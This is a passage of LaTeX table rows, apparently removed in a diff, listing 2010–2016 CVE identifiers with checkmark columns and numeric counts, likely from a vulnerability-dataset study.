-CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule -CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule -CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule -CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule -CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule -CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule -CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule -CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule -CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule -CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule -CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule -CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule -CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule -CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule -CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule -CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule -CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule -CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule -CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule -CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule -CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule -CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule -CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule -CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule -CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule -CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule -CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule -CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule -CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule -CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule -CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule -CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule -CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule -CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule -CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule -CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule -CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule -CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule -CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule -CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule -CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule -CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule -CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule -CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule -CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule -CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule -CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule -CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule -CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule -CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule -CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule -CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule -CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule -CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule -CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule -CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule -CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule -CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule -CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule -CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule -CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule -CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule -CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule -CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule -CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule -CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule -CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule -CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule -CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule -CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule -CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule -CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule -CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule -CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule -CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule -CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule -CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule -CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule -CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule -CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule -CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule 